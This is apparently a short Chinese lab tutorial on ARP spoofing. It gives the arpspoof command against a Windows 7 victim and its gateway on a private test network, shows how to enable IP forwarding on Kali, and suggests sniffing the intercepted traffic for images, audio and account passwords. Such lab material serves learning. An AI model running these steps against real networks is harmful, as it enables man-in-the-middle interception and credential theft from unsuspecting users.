arp欺骗

原理:在内网中,是受害者相信你的设备是网关设备,使网关设备相信你的设备是受害者。

实验步骤(需要了解arp协议)

受害者w7: 192.168.208.129 00-0c-29-0c-6b-bf
攻击者(kali): 192.168.208.128 00-0c-29-87-c2-13
网关 : 192.168.208.2 00-50-56-e7-89-f5

1、 kali中运行:arpspoof -t 192.168.208.129 -r 192.168.208.2

这条命令是利用arpspoof工具执行欺骗过程。(手动实现需要利用可以编辑的抓包工具,对目标主机的广播信息的reply包进行编辑不停发送即可。手动麻烦还需要配置其他回应信息)

kali:

arp欺骗_第1张图片

wp7:

在这里插入图片描述
(以上可以抓包查看)

2、开启kali转发ip数据包功能:

修改/proc/sys/net/ipv4/ip_forward 为1

echo 1 > /proc/sys/net/ipv4/ip_forward
在这里插入图片描述
!!!此文件如果修改了,wp7若还无法上网,继续尝试修改以下文件:

# 在 /etc/sysctl.conf文件中添加
net.ipv4.ip_forward=1
# 事后执行 sysctl -p
# 若还不行,在修改/usr/lib/sysctl.d/50-default.conf文件,加入
net.ipv4.ip_forward = 1 
# 到这一步应该是都可以的,还不行重启试试。

arp欺骗_第2张图片

3、嗅探:

现在就可以为所欲为了(arpspoof要一直跑)。。。可以抓包分析或利用嗅探工具,比如说:
arp欺骗_第3张图片
很多安全工具都可以利用,只要有信息流都可以按照特征抓取,比如图片、音频、账号密码等。

你可能感兴趣的:(网络运维,信息安全)